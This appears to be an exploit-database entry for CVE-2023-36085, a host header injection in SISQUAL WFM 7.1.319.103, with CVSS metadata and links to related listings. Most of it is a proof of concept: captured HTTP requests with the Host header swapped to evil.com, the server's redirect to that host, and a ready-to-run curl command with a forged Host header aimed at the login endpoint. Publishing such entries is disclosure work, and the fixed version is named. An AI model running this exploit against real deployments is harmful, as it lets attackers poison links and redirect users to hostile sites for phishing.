Lucene search
Omer Shaik1337DAY-ID-39296HistoryFeb 05, 2024 - 12:00 a.m.
SISQUAL WFM 7.1.319.103 Host Header Injection Vulnerability
2024-02-0500:00:00
Omer Shaik
0day.today
204
poc scenario
potential vulnerability
webpage manipulation
header tampering
interception
web security
vendor
version
exploit
cve-2023-36085
github
web apps
reference.
CVSS3
6.1
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
AI Score
7.4
Confidence
Low
EPSS
0.001
Percentile
21.7%
# Exploit Title: SISQUAL WFM 7.1.319.103 Host Header Injection
# Exploit Author: Omer Shaik (unknown_exploit)
# Vendor Homepage: https://www.sisqualwfm.com
# Version: 7.1.319.103
# Tested on: SISQUAL WFM 7.1.319.103
# Affected Version: sisqualWFM - 7.1.319.103
# Fixed Version: sisqualWFM - 7.1.319.111
# CVE : CVE-2023-36085
# CVSS: 3.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
# Category: Web Apps
# Reference: https://github.com/omershaik0/Handmade_Exploits/tree/main/SISQUALWFM-Host-Header-Injection-CVE-2023-36085
A proof-of-concept(POC) scenario that demonstrates a potential host header injection vulnerability in sisqualWFM version 7.1.319.103, specifically targeting the /sisqualIdentityServer/core endpoint. This vulnerability could be exploited by an attacker to manipulate webpage links or redirect users to another site with ease, simply by tampering with the host header.
****************************************************************************************************
Orignal Request
****************************************************************************************************
GET /sisqualIdentityServer/core/login HTTP/2
Host: sisqualwfm.cloud
Cookie:<cookie>
Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
****************************************************************************************************
Orignal Response
****************************************************************************************************
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Date: Wed, 22 Mar 2023 13:22:10 GMT
Content-Length: 0
****************************************************************************************************
āāāāāāā āāāāāāā āāāāāāā
āāāāāāāāāāāāāāāāāāāāāāāāā
āāāāāāāāāāā āāāāāā
āāāāāāā āāā āāāāāā
āāā āāāāāāāāāāāāāāāāā
āāā āāāāāāā āāāāāāā
****************************************************************************************************
Request has been modified to redirect user to evil.com (Intercepted request using Burp proxy)
****************************************************************************************************
GET /sisqualIdentityServer/core/login HTTP/2
Host: evil.com
Cookie:<cookie>
Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
****************************************************************************************************
Response
****************************************************************************************************
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://evil.com/sisqualIdentityServer/core/
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Length: 0
****************************************************************************************************
Method of Attack
****************************************************************************************************
curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv
****************************************************************************************************
Related
cvelist
cvelist
CVE-2023-36085
2023-10-24 00:00:00
prion
prion
Design/Logic Flaw
2023-10-25 18:17:00
exploitdb
exploitdb
SISQUALWFM 7.1.319.103 - Host Header Injection
2024-02-15 00:00:00
cve
cve
CVE-2023-36085
2023-10-25 18:17:28
nvd
nvd
CVE-2023-36085
2023-10-25 18:17:28
packetstorm
packetstorm
SISQUAL WFM 7.1.319.103 Host Header Injection
2024-02-05 00:00:00
zdt
zdt
SISQUALWFM 7.1.319.103 - Host Header Injection Vulnerability
2024-02-17 00:00:00
CVSS3
6.1
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
AI Score
7.4
Confidence
Low
EPSS
0.001
Percentile
21.7%
Related for 1337DAY-ID-39296